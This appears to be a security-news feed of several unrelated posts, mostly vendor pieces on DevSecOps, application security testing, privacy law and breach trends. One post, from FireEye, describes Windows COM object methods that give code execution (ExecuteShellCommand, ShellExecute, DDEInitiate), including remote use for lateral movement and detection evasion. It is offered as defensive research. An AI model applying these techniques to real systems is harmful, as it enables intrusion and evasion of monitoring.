So what if Alexa won’t work or my app crashes? Both would probably only be minor annoyances, but software is also impacting us on a much larger scale. Not too long ago, people would be lucky if they had only a two-minute warning that a tornado was coming. Today, weather monitoring and modeling software can predict the formation and path of a tornado with stunning accuracy. And better still they can send text messages to those in danger – providing precious minutes to find shelter.

Farming is being transformed by software as well. Software monitors the moisture levels in soil, and irrigation systems connected to these sensors release the optimal amount of water into the soil. This way, the crops have what they need to grow, and not a drop of water is wasted. There are technologies that monitor crop growth and health and even harvest crops. In other words, software is tackling world hunger. That’s something worth protecting.

When you want to demonstrate to your stakeholders why application security is important to your organization, go back to your company’s mission and ladder up your argument to this ultimate goal. Unum offers disability, life and financial protection to its customers. If your mission is to help people at their most vulnerable moments in life, you need to ensure that they don’t have to worry about their identity being stolen as the result of a data breach in addition to having to figure out medical payments. Making this connection with the core mission can really help tell a story of why application security is crucial to the business.

Starting Out With the Right Questions

Before you can dive head first into your DevSecOps program, you need to ask yourself the right questions:

  • Do you know your application portfolio?
  • Do you have web application security policies defined?
  • Who is responsible for the web application security program?
  • Who is going to fund the program?
  • What is your goal?

Only once you have answered these questions will you be able to find the right formula for your organization. Hooper laid out his program in the rest of the talk, but your organization may differ, so make sure that you ask these questions at the outset.

Building a DevSecOps Program from Scratch

Hooper started at Unum about three years ago as a member of their threat and vulnerability management team. At that point in time, they didn’t have a true web application security program, but they had a relationship with Veracode to assess their top-tier applications, and they were doing basic dynamic analysis with another vendor. At that point, Hooper was fortunate enough to get funding to help expand and mature the program. 

Unum’s primary goal was to reduce risk, so he set out to discover and rate the risk of all of their applications. He helped define security policies for all web applications, including expectations and remediation SLAs. They also decided that security should be responsible for the administration of the AppSec program, and development would cover remediation. 

Hooper chose to expand his relationship with Veracode, covering SAST, DAST, SCA, and eLearning. He also partnered with Veracode to provide live trainings for developers, and signed up for their program management and application security consulting services, which help onboard scrum teams and help developers fix security defects if they get stuck.

In a follow-up blog, we will delve into the details of Hooper’s AppSec program and his path to AppSec maturity.

Live From Gartner Security & Risk Mgmt Summit: How to Approach Container Security

Container security is a topic most security practitioners still find confusing. It’s a new technology that’s spreading fast because of its numbers benefits, and security implications and solutions are evolving just as fast.

That’s why I really appreciated Anna Belak’s session “Container Security – From Image Analysis to Network Segmentation” at the Gartner Security & Risk Management Summit in National Harbor, MD. Anna provided a great framework for thinking about container security that I would like to share with you.

Divide and Conquer: Images, Orchestration, Runtime

After introducing the audience to all of the security challenges and attack vectors for containers, she broke down a container security program into three sections:

  • Securing container images
  • Securing the orchestration plane 
  • Securing containers at runtime 

Today, there’s no security vendor that helps with all three of these areas. Because Veracode focuses on application development security, we focus on securing container images, not the operational parts.

Inside the Sausage Factory: How the Docker Image is Made

A Docker container image is a lightweight, standalone, executable package of software that includes everything you need to run an application: code, runtime, system tools, system libraries and settings. Docker’s run utility is the command that actually launches a container. Each container is an instance of an image, and multiple container instances of the same image can be run simultaneously. Docker images are ephemeral: Container deployments are in constant flux. The average lifetime of a container is 30 minutes. 

The Docker Hub registry is a repository for sharing container images from open source projects and from software vendors. These images are leveraged by developers – often introducing additional risk to the organization.

In her talk, Anna referenced a study of 3,802 official images on the Docker Hub that found a median of 127 vulnerabilities per image. Even more shocking: There were zero images that did not have any vulnerabilities.

Gartner’s Top Recommendations on Container Security

The talk closed with three recommendations:

  • Secure containers holistically through integrating controls at key steps in the CI/CD pipeline. Focusing solely on runtime controls – as you would for software installed VMs – will leave you vulnerable at many ends.
  • Use secrets management and software component analysis as primary container protection strategies. Add Layer 7 network segmentation for operational containers that require defense in depth.
  • Select vendors that can integrate with the container offerings of leading cloud service providers, such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform.

Veracode can help you with the first recommendation: Veracode Software Composition Analysis scans container images for vulnerabilities as part of your CI/CD pipeline to help you find vulnerabilities in the production image. If you’re interested in more information, read our blog post How Veracode Scans Docker Containers for Open Source Vulnerabilities

Embracing the “Sec” in DevSecOps: How Veracode and AWS Work Together to Help You Build Secure Apps

Developers, like most builders, are creative critical thinkers who take pride in their work. Let’s focus on the word “builder” for a moment. During the industrial revolution, we saw a shift in manufacturing where time-consuming processes were made more efficient through automation. With that, we also saw the concept of an assembly line and interchangeable parts transform businesses. The idea was to build as quickly as possible for less cost. Transpose this to software engineering and we see a similar trend: Building software as quickly as possible, using components, and decreasing costs. Implicit in this is the direct correlation between quality of the components and the quality of the final product. This begs the question: Why then are developers selecting poor or insecure components to build their applications? I would argue that the intention to build stable and secure software has always existed, but there is a general lack of awareness and overall confusion on the best approach. We need only look at the latest headlines and read about Fortune 500 companies that have been victims of vulnerabilities despite their best efforts to ship software they thought to be secure. So, how does intent go beyond a mere idea and put into design and practice to mitigate these concerns in the most comprehensive and reliable way possible?

Before we are able to answer that, it is important that we consider a few facts:

  1. Modern applications are complex and made up of various components.
  2. Open source has grown and has found its way into millions of applications across various industries spanning private, public, and even government sectors.
  3. Application security has traditionally been reactive and found later in the development life cycle.

Cloud adoption has made it easier for developers to be empowered to not only build their application, but also provision its supporting infrastructure. Take for example a fully-managed CI/CD pipeline on AWS comprised of AWS CodeCommit, AWS CodePipeline, and AWS CodeBuild with container deployments to AWS Fargate. If you find yourself in a similar scenario or aspire to migrate to AWS to use these services, then which tools do you use, and how do you leverage those correctly to ensure that you are building secure applications? If you are using open source components, then how do you ensure that you are using the right versions of components, or find out where those are being downloaded from? These questions extend to your container images as well. Container images are often opaque in that they typically contain various layers, but it is not immediately clear what security vulnerabilities may be contained within each of those respectively. Are you including inspection of these into your automated workflows?

One of the more prominent blockers to applying security is the perception that doing so will undoubtedly negatively impact time to market. Developers are often under time constraints and are focused on building applications and releasing features as expeditiously as possible. This coupled with the complexity of modern architectures, use of external components and lack of prescriptive guidance on leveraging the right tools at the appropriate stage of the development life cycle leads to exacerbating frustration and the expected reaction is one of avoidance. In other words, we acknowledge the problem, vaguely understand there may be a way or ways to resolve it, but are not clear on how to accomplish that and determine it’s not worth the effort today, after all, there’s always tomorrow.

The truth is that this need not be as daunting as it may seem on the surface. The journey begins with understanding your process and gaining insights into your environment. If you don’t know where your vulnerabilities exist today, then how can you effectively solve them? Second, it’s about applying security at every stage of the process. There are several tools that address specific concerns and were built for specific audiences: Security teams, AppSec teams, Dev teams. Use them accordingly. For example, there is a place for static analysis (SAST), software composition analysis (SCA), dynamic analysis (DAST) testing and monitoring tools designed for finding security defects and completing the feedback loop. It’s critical to understand that you may build a secure application today, but can you quickly iterate and resolve for those vulnerabilities that have yet to be discovered before they negatively impact your business or your customers? These are considerations that are necessary for any business to survive in today’s competitive landscape. Sure, you need to ship features as quickly as possible, but you need to do so without compromising security.

This is where solutions such as those available today from Veracode are integral for any business. Veracode is a full spectrum application security testing solution that begins with Veracode Greenlight in the developers’ IDE and spans across the devevlopment lifecycle with Veracode Manual Penetration Testing. Along the way, you are covered throughout the entire software development life cycle. From the moment developers begin writing code and pushing commits, Veracode Software Composition Analysis (SCA) identifies any open source vulnerability and provides crisp remediation guidance. Integrate Veracode Static Analysis (SAST) into your build and test tools and processes to quickly identify security flaws in your code. Lastly, Veracode Dynamic Analysis (DAST) in your release, deployment and operations process reduces your risk of a breach once your application goes live. These are easily integrated with AWS CodePipeline and CodeBuild to secure your fully managed CI/CD pipelines running in the AWS cloud.

As the complexity of modern applications continues to increase over the years, so too does introducing security into every stage of your development life cycle become a necessity. We live in a highly competitive world with a voracious appetite for innovation. It is critical for businesses to deliver quickly and satisfy customer demand, but equally critical to ensure and preserve customer trust. It is possible to do both without compromising one for the other, and the solutions exist today.

Learn more at AWS re:Inforce this month in Boston – Veracode will be at Booth 813, and speaking on Wednesday the 26th on “Integrating AppSec Into Your DevSecOps on AWS.”

Helping organizations do more without collecting more data



We continually invest in new research to advance innovations that preserve individual privacy while enabling valuable insights from data. Earlier this year, we launched Password Checkup, a Chrome extension that helps users detect if a username and password they enter on a website has been compromised. It relies on a cryptographic protocol known as private set intersection (PSI) to match your login’s credentials against an encrypted database of over 4 billion credentials Google knows to be unsafe. At the same time, it ensures that no one – including Google – ever learns your actual credentials.

Today, we’re rolling out the open-source availability of Private Join and Compute, a new type of secure multi-party computation (MPC) that augments the core PSI protocol to help organizations work together with confidential data sets while raising the bar for privacy.


Collaborating with data in privacy-safe ways

Many important research, business, and social questions can be answered by combining data sets from independent parties where each party holds their own information about a set of shared identifiers (e.g. email addresses), some of which are common. But when you’re working with sensitive data, how can one party gain aggregated insights about the other party’s data without either of them learning any information about individuals in the datasets? That’s the exact challenge that Private Join and Compute helps solve.

Using this cryptographic protocol, two parties can encrypt their identifiers and associated data, and then join them. They can then do certain types of calculations on the overlapping set of data to draw useful information from both datasets in aggregate. All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process. Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics. For example, this could be a count, sum, or average of the data in both sets.


A deeper look at the technology 


Private Join and Compute combines two fundamental cryptographic techniques to protect individual data:

  • Private set intersection allows two parties to privately join their sets and discover the identifiers they have in common. We use an oblivious variant which only marks encrypted identifiers without learning any of the identifiers.
  • Homomorphic encryption allows certain types of computation to be performed directly on encrypted data without having to decrypt it first, which preserves the privacy of raw data. Throughout the process, individual identifiers and values remain concealed. For example, you can count how many identifiers are in the common set or compute the sum of values associated with marked encrypted identifiers – without learning anything about individuals. 

This combination of techniques ensures that nothing but the size of the joined set and the statistics (e.g. sum) of its associated values is revealed. Individual items are strongly encrypted with random keys throughout and are not available in raw form to the other party or anyone else.

Watch this video or click to view the full infographic below on how Private Join and Compute works:

Private Join and Compute

Using multi-party computation to solve real-world problems


Multi-party computation (MPC) is a field with a long history, but it has typically faced many hurdles to widespread adoption beyond academic communities. Common challenges include finding effective and efficient ways to tailor encryption techniques and tools to solve practical problems.

We’re committed to applying MPC and encryption technologies to more concrete, real-world issues at Google and beyond by making privacy technology more widely available. We are exploring a number of potential use cases at Google across collaborative machine learning, user security, and aggregated ads measurement.

And this is just the beginning of what’s possible. This technology can help advance valuable research in a wide array of fields that require organizations to work together without revealing anything about individuals represented in the data. For example:

  • Public policy - if a government implements new wellness initiatives in public schools (e.g. better lunch options and physical education curriculums), what are the long-term health outcomes for impacted students?
  • Diversity and inclusion - when industries create new programs to close gender and racial pay gaps, how does this impact compensation across companies by demographic?
  • Healthcare - when a new preventative drug is prescribed to patients across the country, does it reduce the incidence of disease? 
  • Car safety standards - when auto manufacturers add more advanced safety features to vehicles, does it coincide with a decrease in reported car accidents?

Private Join and Compute keeps individual information safe while allowing organizations to accurately compute and draw useful insights from aggregate statistics. By sharing the technology more widely, we hope this expands the use cases for secure computing. To learn more about the research and methodology behind Private Join and Compute, read the full paper and access the open source code and documentation. We’re excited to see how other organizations will advance MPC and cryptography to answer important questions while upholding individual privacy.


Acknowledgements


Product Manager - Nirdhar Khazanie
Software Engineers - Mihaela Ion, Benjamin Kreuter, Erhan Nergiz, Quan Nguyen, and Karn Seth
Research Scientist - Mariana Raykova


Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area.

20 percent of users will never change behavior, no matter how well you train

Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them.

Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice).

Education is good, but it must be coupled with technical controls

This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training will reduce vulnerabilities being introduced into the code, which reduces the cost of your DevSecOps program because security defects that never enter the code are understandably much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production.

At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect.

Learn more about Veracode’s Developer Training.

Application Security Beyond Static Analysis

There is no application security “silver bullet” – it takes a combination of testing types to effectively reduce your risk. Each testing method has a different role to play and works best when used in harmony with others.

For instance, our research showed that there are significant differences in the types of vulnerabilities you discover dynamically at runtime compared to those you’ll find when doing static testing in a non-runtime environment. In fact, two of the top five vulnerability categories we found during dynamic testing weren’t even among the top five found by static, with one not found by static at all.

Add to this the fact that applications are increasingly “assembled” from open source components, rather than developed from scratch, which means software composition analysis is an important part of your testing mix. Neglecting to assess and keep track of the open source components you are using would leave a large portion of your code exposed and leave you open to attack. 

And finally, automation alone is not enough to ensure an application is thoroughly tested from a security perspective. Some flaws, such as CSRF (Cross-Site Request Forgery) and business logic vulnerabilities, require a human to be in the loop to exploit and verify the vulnerability. Only manual penetration testing can provide positive identification and manual validation of these vulnerabilities.

Here's an overview of the different types of vulnerabilities found by different testing types:

capabilities static analysis software composition analysis dynamic analysis manual penetration testing
Flaws in custom web apps (CWEs) X   X X
Flaws in custom non-web apps (CWEs) X     X
Flaws in custom mobile apps (CWEs) X     X
Known vulnerabilities in open source components (CVEs)   X   X(1)
Behavioral issues (CWEs) X(2)     X
Configuration errors (CWEs)     X X
Business logic flaws (CWEs)       X
Repeatable process for automation X X X  
Scalable to all corporate applications X X X  
Scan speed Seconds to hours Seconds to minutes Hours Days to weeks
Cost per scan $ $ $ $$

1Penetration testing can find known vulnerabilities in open source components, but this may not be as rigorous as Veracode Software Composition Analysis, which not only systematically flags CVEs but also crawls commit histories and bug tracking tickets in open source projects to identify silent fixes of security issues.

2This is not true for all static analyzers. Veracode can exercise the code and manipulate the UI for behavioral analysis in mobile applications.

Here’s a summary of when to use each testing type:

assessment type advantages limitations
Static analysis (with entire application in scope)
  • Very broad coverage of flaw types (CWEs)
  • Looks at the flaws in the context of the entire application, analyzing all the data paths
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Scanning frequency should be in line with how often developers can review scan results
  • Use static analysis as part of Continuous Delivery pipeline and file security issues in bug tracking system
  • Can track flaw history: new, open, fixed. Important for trending reports on mean time to remediation.
  • Suitable for compliance purposes
  • Does not provide instant feedback to developers as they’re coding
  • Cannot find CWEs related to server configurations
  • Limited to code that developers can remediate.
  • Does not report vulnerabilities in third-party components (see: SCA).

Static analysis (on file level, e.g., Greenlight)

  • Recommended for development teams who want to shift left in application security testing by scanning early and often. Scans usually complete in seconds.
  • Best suited when scanning multiple times per day
  • Recommended for use by developers working on the new code for continuous flaw feedback and remediation guidance
  • Developer friendliness: enhances learning, allows developers to find and address issues without exposing flaws in reports
  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes
  • Scans individual files, so can only detect vulnerabilities where source and sink are in same file
  • Typically not suited for compliance scanning because scope limitations may cause false negatives
  • Does not report vulnerabilities in third-party components
Dynamic analysis
  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes
Scan times are often between 12 and 24 hours for complex applications, so recommended for overnight scans, or for asynchronous scanning

Software composition analysis

 

  • Finds vulnerabilities in third-party components
  • Scans take seconds or minutes Can scan any type of application, including web, mobile, desktop, or microservices
  • Suitable for compliance purposes
Does not find flaws in first-party code

 

For more details, check out our new guide, Application Security Best Practices.

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week.

57 Percent of Midsize Enterprises Don’t Have a CISO

Gartner defines midsize enterprises as companies with less than $20 million in IT security budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. This means the CIO is accountable for cybersecurity in most midsize enterprises.

According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of the IT headcount is dedicated to security, so you have to have at least 17 people in IT before you start dedicating a full headcount to security. Below that water mark, it’s only partial headcounts. That’s a lot of security areas to cover for very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, the midsize enterprise is hit even harder by the InfoSec skill gap because they often cannot compete with Fortune 500 salaries and benefits.

How Can Midsize Enterprises Address These Challenges?

Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:

  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  

Framing Security Spending With Executive Leadership

Before Paul joined Gartner, he spent decades working in the trenches in midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you” This is a great mind shift that I can absolutely see working with executives.

I also liked how he boiled down the basics of what a security program must do:

  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on

I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business!

Be Pragmatic and Don’t Do Everything In-House

With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.”

A Recipe for a Successful Security Program in Midsize Enterprise

Paul summed up his recommendations as follows:

  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.

Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations.

How to Do DevSecOps in Midsize Enterprises

Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges.

Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader for six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: You don’t have to set up any infrastructure so your developers can start scanning on day one.

Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning.

Security as a Competitive Advantage

As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.

 

“You may not have the need today, but it’s well worth doing the research today.”

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Veracode Kuppinger Cole Report

Most legacy applications were not developed with security in mind. However, modern businesses and organizations are continuing to undergo digital transformation in order to pursue new business models and revenue channels, as well as giving their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that allow for the scalability necessary to provide applications and services to a broad customer base.

For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service.

But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought.

With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications.

Veracode pioneered static binary analysis to address the security of modern applications, which are often comprised from different teams, languages, frameworks and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits.

Yet the Veracode Platform offers so much more than its signature static binary analysis.

“With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.”

To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.

Fifty States, Fifty Laws

The big news lately is that individual states are proposing their own privacy laws. California has the California Consumer Protection Act and now New York and Maine have also proposed laws. There has been discussion of a federal law, however it seems unlikely that any kind of landmark legislation on privacy passes through to be […]

The post Fifty States, Fifty Laws appeared first on Privacy Ref.

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats —and the data in this year’s DBIR show that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. And that makes sense, when you take the threat actors’ POV into account. Nefarious attackers know that small and mid-size businesses don’t have the cyber hygiene that’s expected of enterprise organizations. Yet, the personally identifiable information (PII) and the intellectual property of smaller organizations is just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too. The DBIR showed an increase in hackers’ focus to cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials AND can be prevented with better education amongst staff, paired with anti-phishing technology and managed security services. All affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick-off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program
 Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.

 

The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Privacy Comes at a Price

At Apple’s World Wide Developers Conference last week, the message was all about Privacy. Apple has been more privacy-minded than other tech companies – that’s not news and it’s why I have an iPhone. They’ve introduced some interesting privacy features, such as showing location tracking, which I think is pretty cool. I don’t leave my […]

The post Privacy Comes at a Price appeared first on Privacy Ref.

CCPA is a Shiny Object

The California Consumer Protection Act has gotten a lot of attention recently and rightly so. It is, however, just one of a number of US state privacy legislation initiatives that have either recently been passed or is under consideration. Consider the Maine Act to Protect the Privacy of Online Consumer Information. This law requires that […]

The post CCPA is a Shiny Object appeared first on Privacy Ref.

Hunting COM Objects (Part Two)

Background

As a follow up to Part One in this blog series on COM object hunting, this post will talk about taking the COM object hunting methodology deeper by looking at interesting COM object methods exposed in properties and sub-properties of COM objects.

What is a COM Object?

According to Microsoft, “The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.”

A COM object’s services can be consumed from almost any language by multiple processes, or even remotely. COM objects are usually obtained by specifying a CLSID (an identifying GUID) or ProgID (programmatic identifier). These COM objects are published in the Windows registry and can be extracted easily, as described below.

COM Object Enumeration

FireEye performed research into COM objects on Windows 10 and Windows 7, along with COM objects in Microsoft Office. Part One of this blog series described a technique for enumerating all COM objects on the system, instantiating them, and searching for interesting properties and methods. However, this only scratches the surface of what is accessible through these COM objects, as each object may return other objects that cannot be directly created on their own.

The change introduced here recursively searches for COM objects, which are only exposed through member methods and properties of each enumerated COM object. The original methodology looked at interesting methods exposed directly by each object and didn’t recurse into any properties that may also be COM objects with their own interesting methods. This improvement to the methodology assisted in the discovery of a new COM object that can be used for code execution, and new ways to call publicly known code execution COM object methods.

Recursive COM Object Method Discovery

A common theme among publicly discovered techniques for code execution using COM objects is that they take advantage of a method that is exposed within a child property of the COM object. An example of this is the “MMC20.Application” COM object. To achieve code execution with this COM object, you need to use the “ExecuteShellCommand” method on the View object returned by the “Document.ActiveView” property, as discovered by Matt Nelson in this blog post. In Figure 1 you can see how this method is only discoverable within the object returned by “Document.ActiveView”, and is not directly exposed by the MMC20.Application COM object.


Figure 1: Listing ExecuteShellCommand method in MMC20.Application COM object

Another example of this is the “ShellBrowserWindow” COM object, which was also first written about by Matt Nelson in this blog post. As you can see in Figure 2, the “ShellExecute” method is not directly exposed in the COM object. However, the “Document.Application” property returns an instance of the Shell object, which exposes the ShellExecute method.


Figure 2: Listing ExecuteShellCommand method in ShellBrowserWindow COM object

As evidence of the previous two examples, it is important to not only look at methods exposed directly by the COM object, but also recursively look for objects with interesting methods exposed as properties of COM objects. This example also illustrates why simply statically exploring the Type Libraries of the COM objects may not be sufficient. The relevant functions are only accessed after dynamically enumerating objects of the generic type IDispatch. This recursive methodology can enable finding new COM objects to be used for code execution, and different ways to use publicly known COM objects that can be used for code execution.

An example of how this recursive methodology found a new way to call a publicly known COM object method is the “ShellExecute” method in the “ShellBrowserWindow” COM object that was shown previously in this article. The previously publicly known way of calling this method within the “ShellBrowserWindow” COM object is using the “Document.Application” property. The recursive COM object method discovery also found that you can call the “ShellExecute” method on the object returned by the “Document.Application.Parent” property as seen in Figure 3. This can be useful from an evasion standpoint.


Figure 3: Alternative way to call ShellExecute with ShellBrowserWindow COM object

Command Execution

Using this recursive COM object method discovery, FireEye was able to find a COM object with the ProgID “Excel.ChartApplication” that can be used for code execution using the DDEInitiate method. This DDEInitiate method of launching executables was first abused in the “Excel.Application” COM object as seen in this article by Cybereason. There are multiple properties in the “Excel.ChartApplication” COM object that return objects that can be used to execute the DDEInitiate method as seen in Figure 4. Although this DDEInitiate method is also exposed directly by the COM object, it was initially discovered when looking at methods exposed in the other objects accessible from this object.


Figure 4: Different ways to call DDEInitiate with Excel.ChartApplication COM object

This COM object can also be instantiated and used remotely for Office 2013 as seen in Figure 5. The COM object can only be instantiated locally on Office 2016. When trying to instantiate it remotely against Office 2016, an error code will return indicating that the COM object class is not registered for remote instantiation.


Figure 5: Using Excel.ChartApplication remotely against Office 2013

Conclusion

The recursive searching of COM object methods can lead to the discovery of new COM objects that can be used for code execution, and new ways to call publicly known COM object methods. These COM object methods can be used to subvert different detection patterns and can also be used for lateral movement.

What the AMCA Data Breach Teaches Us About Modern Supply Chain Security

The State of Software Security Volume 9 (SOSS Vol. 9) found that the healthcare industry, with its stringent regulations, received relatively high marks in many of the standard AppSec metrics. According to Veracode scan data, healthcare organizations ranked highest of all industries on OWASP pass rate on latest scan, coming in with a rate just over 55 percent. Our flaw persistence analysis shows that the industry is statistically closing found vulnerabilities far faster than any other sector.

However, the recent American Medical Collection Agency data breach has brought attention to the fact that breaches involving subcontractors and business associates, particularly in the healthcare industry, are on the rise. As both Quest Diagnostics and Laboratory Corporation of America Holdings (LabCorp) have filed 8-Ks with the Security and Exchange Commission (SEC), as many as 11.9 million people may have had their personal and payment information stolen by an unauthorized user.

Earlier this year, Moody’s Investor Service ranked hospitals as one of the sectors most vulnerable to cyberattacks. In a press release, Moody's Managing Director Derek Vadala said, “We view cyber risk as event risk that can have material impact on sectors and individual issuers. Data disclosure and business disruption are the two primary types of cyber event risk that we view as having the potential for material impact on issuers' financial profiles and business prospects.”

Ensuring the security of patient data

Healthcare organizations appear to be doing their part to ensure the safety of their patient and customer data. Recently, the Wall Street Journal’s Melanie Evans and Peter Loftus published a story about how hospitals are asking device makers to let them under the hood of their software to look for flaws and vulnerabilities – and opting out of doing business if they’re not granted access. The article cites how, in 2017, NewYork-Presbyterian dropped plans to buy infusion pumps manufactured by Smiths Group PLC after the Department of Homeland Security issued a warning that hackers could take control of pumps (a fix has since been released).

That same year, many hospitals were forced to cancel appointments and surgeries when their operations were stunted by WannaCry and NotPetya cyberattacks – so it’s no wonder hospitals began enlisting the help of cybersecurity pros, including penetration testers.

Evans and Loftus spoke with corporate counsel at Boston Scientific who noted that negotiations with hospitals are more complicated and drawn out than ever before as a result of cybersecurity demands.

Where is the gap in the modern healthcare supply chain?

Given the sensitivity of the data involved, it’s reasonable for hospitals and healthcare IT companies to be more inquisitive. But it’s not just the healthcare-related technologies that they need to look into.

